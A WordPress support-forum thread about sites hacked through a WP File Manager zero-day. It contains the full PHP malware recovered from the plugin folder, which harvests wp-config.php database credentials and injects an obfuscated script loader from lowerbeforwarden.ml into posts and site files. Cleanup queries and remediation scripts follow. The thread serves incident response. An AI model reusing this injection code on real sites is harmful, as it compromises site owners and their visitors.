Got hacked – Zero day vulnerability
Looks like there is a zero-day vulnerability in WP File Manager.
My site got hacked and some of my URLs are redirecting to other pages.
I don't know what they changed or how to fix it. Does anyone know how to fix it?
Specifically, this page is redirecting: https://spicecravings.com/thai-red-curry-soup
Hello @fierevere,
This was published recently on both the Sucuri and Wordfence websites; take a look at this:
@glasnik
Please don't publish security-related links.
Whoever subscribed to the Sucuri and WF blogs can read it anyway. Please update to version 6.9 of this plugin. The issue is fixed.
If you have been hacked:
Carefully follow this guide. When you're done, you may want to implement some (if not all) of the recommended security measures and start backing up your site.
Thank you. I installed Wordfence and it found a lot of issues. What a nightmare.
I wish WP File Manager had somehow notified its users of the hack so we could have upgraded, or had marked the update as a critical update.
Hi @aneeshasg,
The File Manager Community was notified of the security update.
Please make sure you update the File Manager plugin to v6.9 if you are using File Manager Free, or to v7.9 if you are using File Manager Pro. Here is some documentation to assist you with the process: https://filemanagerpro.io/article/how-to-download-latest-version-of-file-manager-pro/
If you have any further questions, please reach out to us using this link and we would be happy to further assist you with this.
https://filemanagerpro.io/contact/
Thanks!
Seems to be the same problem I have. 3 of my WordPress sites were hacked, and 3 other WP sites were not. The difference between them is that the hacked sites had WP File Manager installed. Yesterday the infected sites crashed. While investigating this problem I found that the first contamination was on 21.08.2020.
Hi everyone, the script that caused all this has been added below. I have commented out a few bits in the code so it doesn't affect anything.
This came from the wp-file-manager plugin folder. The first step would be to remove this folder from the plugins directory.
<?php
echo "ssqqss>>>";
error_reporting(E_ALL);
ini_set('display_errors', 1);
// Entry point: start eight levels above the web root (i.e. the filesystem root on most
// hosts) and look for .js files. The recursive calls and the make_it_* calls below were
// commented out by the poster, so as posted the script only lists the start directory.
search_file_js($_SERVER['DOCUMENT_ROOT'] . "/../../../../../../../../", ".js");
die();

// Pull the first capture group of a regex out of $text (used on wp-config.php defines).
function get_var_reg($pat, $text) {
    if ($c = preg_match_all("/" . $pat . "/is", $text, $matches)) {
        return $matches[1][0];
    }
    return "";
}

// Recursively look for files whose name contains $file_to_search (wp-config.php) and
// hand each one to show_sitenames().
function search_file_ms($dir, $file_to_search) {
    $search_array = array();
    $files = scandir($dir);
    if ($files == false) {
        $dir = substr($dir, 0, -3);
        if (strpos($dir, '../') !== false) {
            @search_file_ms($dir, $file_to_search);
            return;
        }
        if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {
            @search_file_ms($dir, $file_to_search);
            return;
        }
    }
    foreach ($files as $key => $value) {
        $path = realpath($dir . DIRECTORY_SEPARATOR . $value);
        if (!is_dir($path)) {
            if (strpos($value, $file_to_search) !== false) {
                show_sitenames($path);
            }
        } else if ($value != "." && $value != "..") {
            @search_file_ms($path, $file_to_search);
        }
    }
}

// Read the DB credentials out of a wp-config.php, connect with them, and append the
// loader <script> tag to post_content in every table whose name contains "post" in every
// schema those credentials can reach (not only the schema named in DB_NAME).
function show_sitenames($file) {
    $content = @file_get_contents($file);
    if (strpos($content, "DB_NAME") !== false) {
        $db   = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]", $content);
        $host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]", $content);
        $user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]", $content);
        $pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]", $content);
        // Create connection
        $conn = new mysqli($host, $user, $pass);
        // Check connection
        if ($conn->connect_error) {
        } else {
            $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
            $result = $conn->query($q);
            if ($result->num_rows > 0) {
                while ($row = $result->fetch_assoc()) {
                    $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " LIMIT 1 ";
                    $result2 = $conn->query($q2);
                    if ($result2->num_rows > 0) {
                        while ($row2 = $result2->fetch_assoc()) {
                            $val = $row2['post_content'];
                            // Note: strpos() never returns true, so this branch is dead as posted.
                            if (strpos($val, "scripts.lowerbeforwarden.ml") === true) {
                                var_dump($val);
                                exit;
                                if (strpos($val, "scripts.lowerbeforwarden.ml") === false) {
                                    $q3 = "UPDATE " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " set post_content = CONCAT(post_content,\"<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%scripts.lowerbeforwarden.ml%'";
                                    $conn->query($q3);
                                    echo "sql:" . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"];
                                } else {
                                }
                            }
                        }
                    } else {
                    }
                }
            } else {
            }
            $conn->close();
        }
    }
}

// Recursive walk for .php/.htm files; would call make_it() on each (calls commented out).
function search_file($dir, $file_to_search) {
    $files = @scandir($dir);
    if ($files == false) {
        $dir = substr($dir, 0, -3);
        if (strpos($dir, '../') !== false) {
            //@search_file($dir, $file_to_search);
            return;
        }
        if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {
            //@search_file($dir, $file_to_search);
            return;
        }
    }
    foreach ($files as $key => $value) {
        $path = realpath($dir . DIRECTORY_SEPARATOR . $value);
        if (!is_dir($path)) {
            if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) {
                //make_it($path);
            }
        } else if ($value != "." && $value != "..") {
            //search_file($path, $file_to_search);
        }
    }
}

// Same walk for index files; would call make_it_index() on each (calls commented out).
function search_file_index($dir, $file_to_search) {
    $files = @scandir($dir);
    if ($files == false) {
        $dir = substr($dir, 0, -3);
        if (strpos($dir, '../') !== false) {
            //search_file_index($dir, $file_to_search);
            return;
        }
        if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {
            //search_file_index($dir, $file_to_search);
            return;
        }
    }
    foreach ($files as $key => $value) {
        $path = realpath($dir . DIRECTORY_SEPARATOR . $value);
        if (!is_dir($path)) {
            if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) {
                //make_it_index($path);
            }
        } else if ($value != "." && $value != "..") {
            //search_file_index($path, $file_to_search);
        }
    }
}

// Same walk for .js files; would call make_it_js() on each (calls commented out).
function search_file_js($dir, $file_to_search) {
    $files = @scandir($dir);
    if ($files == false) {
        $dir = substr($dir, 0, -3);
        if (strpos($dir, '../') !== false) {
            //@search_file_js($dir, $file_to_search);
            return;
        }
        if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {
            //@search_file_js($dir, $file_to_search);
            return;
        }
    }
    foreach ($files as $key => $value) {
        $path = realpath($dir . DIRECTORY_SEPARATOR . $value);
        if (!is_dir($path)) {
            if (strpos($value, $file_to_search) !== false && (strpos($value, ".js") !== false)) {
                //make_it_js($path);
            }
        } else if ($value != "." && $value != "..") {
            //search_file_js($path, $file_to_search);
        }
    }
}

// Prepend the obfuscated loader to a .js file. The char codes it checks for spell
// "scripts.lowerbeforwarden.ml", but the loader it writes points at
// "temp.lowerbeforwarden.ml", so the check never matches and repeat runs stack copies.
function make_it_js($f) {
    $g = file_get_contents($f);
    if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false) {
    } else {
        $l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
        $g = file_get_contents($f);
        $g = $l2 . $g;
        @system('chmod 777 ' . $f);
        @file_put_contents($f, $g);
        echo "js:" . $f . "\r\n";
    }
}

// Prepend a plain <script src> tag to an index file. ($g is tested before it is read
// here, so the "already infected" check is always false as posted.)
function make_it_index($f) {
    if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false || strpos($g, 'scripts.lowerbeforwarden.ml') !== false) {
    } else {
        $l2 = "<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>";
        $g = file_get_contents($f);
        $g = $l2 . $g;
        @system('chmod 777 ' . $f);
        @file_put_contents($f, $g);
        echo "in:" . $f . "\r\n";
    }
}

// Splice the loader next to <head> / </head> in PHP and HTML files.
function make_it($f) {
    $g = file_get_contents($f);
    if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false) {
    } else {
        $l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
        if (strpos($g, '<head>') !== false) {
            $b = str_replace("<head>", "<head>" . $l2, $g);
            @system('chmod 777 ' . $f);
            @file_put_contents($f, $b);
            echo "hh:" . $f . "\r\n";
        }
        if (strpos($g, '</head>') !== false) {
            $b = str_replace("</head>", $l2 . "</head>", $g);
            @system('chmod 777 ' . $f);
            @file_put_contents($f, $b);
            echo "hh:" . $f . "\r\n";
        }
    }
}
I was trying to reverse engineer the hack.
The code attacks .js files and index files. It also attacks any file that has <head> in it.
The first step would be to remove all occurrences of these scripts. I used VSCode to remove them by searching for:
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
and
<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>
You can quickly remove these by running find and replace.
After that, run this script on your wp sql database.
UPDATE wp_posts SET post_content = REPLACE(post_content, "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>", '') WHERE post_content LIKE '%lowerbeforwarden%';
If you have W3 cache or any other cache plugin, remove the cache directory.
It had infected around 12-plus sites on my server, including other PHP projects that were on the server.
Hope it helps.
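As an added example (not code from the thread, the plugin vendor, or any of the posters above), the following Python script does the two things a responder wants at this point: it decodes the String.fromCharCode() sequences in the posted malware to recover the loader URL, then walks a site tree and strips all three injection shapes in one pass (the bare prefix make_it_js() puts in .js files, the <script src> tag make_it_index() puts in index files, and the <head> splice make_it() puts in PHP/HTML files). Because the malware's "already infected" check looks for scripts.lowerbeforwarden.ml while it injects temp.lowerbeforwarden.ml, repeat runs stack several copies, so the cleaner removes every copy rather than the first. The sample tree it builds, and the list of file extensions it touches, are assumptions for the demonstration.

```python
"""Decode the obfuscated lowerbeforwarden loader and strip every copy from a site tree.
Added example; not code from the forum thread or the plugin vendor."""
import os
import re
import tempfile
from typing import Dict, Tuple

# Char-code sequences copied verbatim from the malware posted above.
MARKER_CODES = ("115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,"
                "111,114,119,97,114,100,101,110,46,109,108")
SRC_CODES = ("104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,"
             "111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115")


def decode_charcodes(codes: str) -> str:
    """Turn a String.fromCharCode argument list back into the text it spells."""
    return "".join(chr(int(n)) for n in codes.split(","))


LOADER_SRC = decode_charcodes(SRC_CODES)  # https://temp.lowerbeforwarden.ml/temp.js

# The exact loader that make_it() / make_it_js() prepend (the string searched for in VSCode above).
LOADER_JS = (
    "Element.prototype.appendAfter = function(element) "
    "{element.parentNode.insertBefore(this, element.nextSibling);}, false;"
    "(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); "
    "elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); "
    "elem.src = String.fromCharCode(" + SRC_CODES + ");"
    "elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);"
    "elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);"
    "document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();"
)

# Three shapes, in the order they must be removed: the <head> splice (make_it), the bare
# prefix in .js files (make_it_js), and the <script src> tag (make_it_index and the SQL UPDATE).
PATTERNS = [
    re.compile(r"<script type=text/javascript>\s*" + re.escape(LOADER_JS) + r"\s*</script>"),
    re.compile(re.escape(LOADER_JS)),
    re.compile(r"<script[^>]*src=['\"]https?://[a-z0-9.-]*lowerbeforwarden\.ml/[^'\"]*['\"][^>]*>\s*</script>", re.I),
]
TARGET_EXT = (".js", ".php", ".html", ".htm")  # assumption: the extensions the malware targets


def clean_text(text: str) -> Tuple[str, int]:
    """Remove every injected loader from text; return (cleaned text, copies removed)."""
    removed = 0
    for pat in PATTERNS:
        text, n = pat.subn("", text)
        removed += n
    return text, removed


def clean_tree(root: str, dry_run: bool = True) -> Dict[str, int]:
    """Walk root; return {relative path: copies found} and rewrite files unless dry_run."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(TARGET_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                cleaned, n = clean_text(fh.read())
            if n:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = n
                if not dry_run:
                    with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                        fh.write(cleaned)
    return hits


def demo() -> Dict[str, int]:
    """Constructed site tree carrying all three injection shapes; returns what was cleaned."""
    root = tempfile.mkdtemp(prefix="wpclean-")
    os.makedirs(os.path.join(root, "wp-content", "themes", "t"))
    samples = {
        "wp-content/themes/t/app.js": LOADER_JS * 2 + "console.log('app');\n",  # stacked twice
        "index.html": f"<script type='text/javascript' src='{LOADER_SRC}?n=nb5'></script><html></html>",
        "wp-content/themes/t/header.php": "<html><head><script type=text/javascript> " + LOADER_JS
                                          + "</script><title>t</title></head>",
        "notes.txt": LOADER_JS,  # not a target extension, deliberately left alone
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    hits = clean_tree(root, dry_run=False)
    assert clean_tree(root) == {}  # a second pass finds nothing left
    return hits


if __name__ == "__main__":
    print(decode_charcodes(MARKER_CODES), LOADER_SRC)
    print(demo())
```

Run clean_tree(root) first (the default dry run) to list hits, then with dry_run=False to rewrite; clear the cache plugin's directory afterwards as noted above. For the database side, the posted UPDATE ... REPLACE query removes every stacked copy, but note from the malware's own SQL that it appends the tag to any table whose name contains "post" in any schema the wp-config credentials can open, so run it against each such table and not only wp_posts, and check that your table prefix is actually wp_.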
Hi @aneeshasg
Please contact us at https://filemanagerpro.io/contact, we would like to schedule a call to work with you personally to help resolve this issue.
Thanks!
Hi @crimeahrg
Please contact us at https://filemanagerpro.io/contact, we would like to schedule a call to work with you personally to help resolve this issue.
Thanks!
Hello,
A vulnerability in the plugin caused many, many sites to be infected with a virus called "lowerbeforwarden". A vulnerable file in the WP File Manager plugin enabled the attackers to inject the virus into sites.
A fix you can try:
If you are able to access the admin panel, then first install the plugin called "MalCure" and run a scan. The scan will show you all the infected files; then you can use FTP to search through the files and delete them or just remove the part that is the virus code. Next you may also want to fully replace the wp-admin and wp-includes folders in your WP installation to be safe.
A little more detailed steps:
https://www.stramaxon.com/2020/04/wordpress-ico-malware-redirect.html
The cleanup is mostly deleting the infected files and updating the vulnerable plugin.
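Replacing wp-admin and wp-includes is sound advice, and the check that goes with it is to compare the live copies against a pristine tree of the same WordPress release so that modified files and, more importantly, extra files that no release ships are listed before anything is overwritten. The following Python script is an added example (not from the thread or the plugin vendor) that does that comparison offline; the two trees it builds under a temporary directory are constructed for the demonstration, and in practice the clean side would be the unpacked release archive for the version shown in wp-includes/version.php.

```python
"""Compare a live WordPress core tree against a pristine copy of the same release and
list modified, added and missing files. Added example; not code from the thread."""
import hashlib
import os
import tempfile
from typing import Dict, List


def sha256_file(path: str) -> str:
    """Stream-hash one file so large uploads do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def tree_hashes(root: str) -> Dict[str, str]:
    """{relative path: sha256} for every regular file under root."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            out[os.path.relpath(path, root).replace(os.sep, "/")] = sha256_file(path)
    return out


def compare_trees(clean_root: str, live_root: str) -> Dict[str, List[str]]:
    """Files whose hash differs, files only in the live tree (where dropped-in PHP hides),
    and files only in the clean tree."""
    clean, live = tree_hashes(clean_root), tree_hashes(live_root)
    return {
        "modified": sorted(p for p in clean if p in live and clean[p] != live[p]),
        "added": sorted(p for p in live if p not in clean),
        "missing": sorted(p for p in clean if p not in live),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed clean and live trees: one untouched file, one with a script tag
    prepended, one extra PHP file dropped into wp-includes, one file deleted."""
    base = tempfile.mkdtemp(prefix="wpverify-")
    clean, live = os.path.join(base, "clean"), os.path.join(base, "live")
    files = {  # stand-ins for release files; contents are placeholders
        "wp-includes/version.php": "<?php $wp_version = '5.5';\n",
        "wp-includes/functions.php": "<?php function f() {}\n",
        "wp-admin/index.php": "<?php require_once 'admin.php';\n",
    }
    for root in (clean, live):
        for rel, body in files.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
    with open(os.path.join(live, "wp-includes/functions.php"), "w", encoding="utf-8") as fh:
        fh.write("<script src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>"
                 + files["wp-includes/functions.php"])
    with open(os.path.join(live, "wp-includes/.cache.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php // not part of any WordPress release\n")
    os.remove(os.path.join(live, "wp-admin/index.php"))
    return compare_trees(clean, live)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

When WP-CLI is available on the host, wp core verify-checksums does the same comparison against the checksums WordPress.org publishes for each release; the offline version above is for the case where the site has been taken down or WP-CLI cannot run. Either way it covers only files that ship with core: themes, plugins and uploads under wp-content need their own reference copy (or a known-clean backup) before they are trusted again.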
@mndpsingh287 While I appreciate you offering to help people with hacked sites, it is still not fair that you have still not posted anything to document the ways and methods to disinfect the site; instead you are offering help over email, which is not doing anything for the many of your plugin users who just want to get rid of the virus and would do it themselves if they knew how.
Hi @mndpsingh287
Thanks for the offer. For now, I uninstalled the plugin, so I don't really need help anymore. I had to clean up the site and files (painful, and it needed deep technical help from someone).
Is there any evidence that through this exploit, the hackers were able to inject code/make changes in the database or any other part of the file systems outside of WordPress?
Hi @depy thank you for sharing this fix!
To our valued File Manager community,
We have a few updates to share with you on what is coming up:
– We are in the process of developing a solution to share publicly by early next week
– We are preparing a new release for more security in the coming week
– We are reviewing opportunities for the community to participate in programs to support us in identifying and finding solutions for bugs or vulnerabilities.
Stay tuned!
In the meantime, we still ask anyone who needs assistance to reach out to us and we will provide you with custom support to get you through any issues you are experiencing as a result of this vulnerability. Contact us at https://filemanagerpro.io/contact?
Thanks!